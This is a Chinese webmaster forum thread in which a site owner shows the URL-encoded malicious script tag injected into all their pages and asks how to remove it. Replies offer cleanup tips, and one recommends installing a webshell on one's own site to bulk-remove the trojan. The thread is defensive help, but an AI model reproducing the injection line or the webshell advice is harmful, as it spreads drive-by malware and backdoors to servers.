学习型 ASP/PHP/ASP.NET 主机 30元/年全能 ASP/PHP/ASP.NET 主机,支持月付专业 MSSQL 数据库空间,支持月付专业 MySQL 数据库空间,支持月付
发新话题
打印

所有网页文件最后加了一个js代码,中招了,晕呀

所有网页文件最后加了一个js代码,中招了,晕呀

所有页面最后都加了一个
<script src=http://%76%63%63%64%2E%63%6E></script>
这是什么毒呀,谁有专杀工具?我前些天清理掉,今天又有呀,完了,有什么法子呀,服务器自己的,就放了一个网站

TOP

你的网站被挂马了

网站存在漏洞所至,删除了代码治标不治本,关键是要找到它入侵的真正原因才能根除。
改变一切,须从改变观念开始!

TOP

这个得顶上来我也正在解决这问题
script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');}
大家看这段能不能把含有HTTP的替换为本地400文件

TOP

原理:将外域的JS文件的src重写成本地IE404错误页面的地址,这样,外域的JS代码不会下载。但我测试不行,有高手看看哪有问题

TOP

一个小建议:在排除了作怪的程序后,可以用 Editplus 编辑器解决:
先用搜索功能查出所有这些ASP文件,然后点鼠标右键选Editplus可以全部打开,用替换的方法删除,它有一个选项:所有打开的文件,勾选即可,替换完成后选择菜单里的全部保存,全部关闭

TOP

我的网站也被挂了。。哎~~~都不知道怎么删除。太烦人了

TOP

网上查的方法:http://www.asp1988.cn/onews.asp?id=114
不知道有没有帮助!!
学建网站:www.lele1988.cn

TOP

呵呵  一个最简单的办法
自己在自己网站上挂个webshell里面有个功能"批量清除木马"
清完之后检查下自己网站的漏洞
一般都是注入漏洞或者是管理员帐户那里存在的  还有上传漏洞
注意下就行了
新手!

TOP

发新话题